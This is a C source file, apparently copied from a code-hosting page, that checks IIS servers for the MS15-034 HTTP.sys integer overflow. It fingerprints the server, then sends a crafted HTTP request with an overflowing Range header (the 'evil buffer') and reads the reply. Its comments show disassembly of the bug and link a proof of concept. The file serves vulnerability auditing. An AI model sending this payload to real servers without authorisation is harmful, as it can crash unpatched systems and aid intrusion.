108 lines
No EOL
2.4 KiB
C
108 lines
No EOL
2.4 KiB
C
/*
|
|
UNTESTED - MS15-034 Checker
|
|
|
|
THE BUG:
|
|
|
|
8a8b2112 56 push esi
|
|
8a8b2113 6a00 push 0
|
|
8a8b2115 2bc7 sub eax,edi
|
|
8a8b2117 6a01 push 1
|
|
8a8b2119 1bca sbb ecx,edx
|
|
8a8b211b 51 push ecx
|
|
8a8b211c 50 push eax
|
|
8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here
|
|
|
|
ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4
|
|
|
|
BY: john.b.hale@gmai.com
|
|
Twitter: @rhcp011235
|
|
*/
|
|
|
|
#include <sys/socket.h>
|
|
#include <sys/types.h>
|
|
#include <netinet/in.h>
|
|
#include <netdb.h>
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <errno.h>
|
|
#include <arpa/inet.h>
|
|
|
|
int connect_to_server(char *ip)
|
|
{
|
|
int sockfd = 0, n = 0;
|
|
|
|
struct sockaddr_in serv_addr;
|
|
struct hostent *server;
|
|
|
|
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
|
|
{
|
|
printf("\n Error : Could not create socket \n");
|
|
return 1;
|
|
}
|
|
|
|
memset(&serv_addr, '0', sizeof(serv_addr));
|
|
serv_addr.sin_family = AF_INET;
|
|
serv_addr.sin_port = htons(80);
|
|
if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0)
|
|
{
|
|
printf("\n inet_pton error occured\n");
|
|
return 1;
|
|
}
|
|
if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
|
|
{
|
|
printf("\n Error : Connect Failed \n");
|
|
return 1;
|
|
}
|
|
|
|
return sockfd;
|
|
}
|
|
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
int n = 0;
|
|
int sockfd;
|
|
char recvBuff[1024];
|
|
|
|
// Check server
|
|
char request[] = "GET / HTTP/1.0\r\n\r\n";
|
|
|
|
// our evil buffer
|
|
char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
|
|
|
|
|
|
if(argc != 2)
|
|
{
|
|
printf("\n Usage: %s <ip of server> \n",argv[0]);
|
|
return 1;
|
|
}
|
|
|
|
printf("[*] Audit Started\n");
|
|
sockfd = connect_to_server(argv[1]);
|
|
write(sockfd, request, strlen(request));
|
|
read(sockfd, recvBuff, sizeof(recvBuff)-1);
|
|
|
|
if (!strstr(recvBuff,"Microsoft"))
|
|
{
|
|
printf("[*] NOT IIS\n");
|
|
exit(1);
|
|
}
|
|
|
|
sockfd = connect_to_server(argv[1]);
|
|
write(sockfd, request1, strlen(request1));
|
|
read(sockfd, recvBuff, sizeof(recvBuff)-1);
|
|
if (strstr(recvBuff,"Requested Range Not Satisfiable"))
|
|
{
|
|
printf("[!!] Looks VULN\n");
|
|
exit(1);
|
|
} else if(strstr(recvBuff,"The request has an invalid header name")) {
|
|
printf("[*] Looks Patched");
|
|
} else
|
|
printf("[*] Unexpected response, cannot discern patch status");
|
|
|
|
|
|
|
|
|
|
} |